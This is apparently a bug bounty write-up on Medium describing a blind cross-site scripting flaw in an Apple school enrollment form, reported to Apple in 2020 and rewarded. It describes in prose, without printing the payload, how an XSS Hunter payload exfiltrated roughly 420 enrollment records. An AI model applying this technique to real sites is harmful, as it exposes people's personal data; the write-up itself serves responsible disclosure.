Blind XSS in Apple School- Enrollment Data Disclosure

Hello!

I’am Hackrzvijay

I have found blind xss in apple school during october 2020.

Reproduction Steps:

During researching apple i have found one subdomain school.apple.com

In the enrollment form i have added my xss hunter payload multiple times which was created by iammandatory

After adding the payload the enrollment data has fired in my xss hunter within 5 to 10 seconds.

Nearly 420 records have been disclosed at the time of research but large number is possible in real time if continuously payload is added.

Above is the data and below is the proof that my xsshunter payload has executed.

The data discloses like

Organization name
enrollee firstname and last name
country
assigned apple employee email
organziation type

Attacker if continuously adds the xsshunter payloads so he can get data in real time within 5 to 10 seconds.

Impact:

First attacker executes the vulnerable code in the back end.

Next attacker will retrieves the enrollment data in large number.

I have reported immediately to apple security and they fixed the bug immediately.

Reported: October 13th 2020

Bounty Rewarded: $5,000 on june 3rd 2021

Thanks to apple security Team!

Follow me on twitter

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

BambooDeFi - Listing Update.

AMA RECAP: BLOCKCHAIN INFINITY X WICRYPT

Quick from HackTheBox Walkthrough

{UPDATE} 全民撑杆跳-跑酷渣达人 Hack Free Resources Generator

How to minimize the risks and dangers of supply chain attacks

Shade Protocol Airdrop for $ATOM and $SCRT Stakers

{UPDATE} Hercules VI Hack Free Resources Generator

[TIL] 5 Easy tools to Fingerprint WebApps from CLI

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
hackrzvijay

hackrzvijay

More from Medium

Unauthenticated Sensitive Information Disclosure | CVE-2021–38314

How did I find Log4j vulnerability via Static Code Analysis and receive €€€ bounty?

Insecure Deserialization — FAQ

elasticpwn: how to collect and analyse data from exposed Elasticsearch and Kibana instances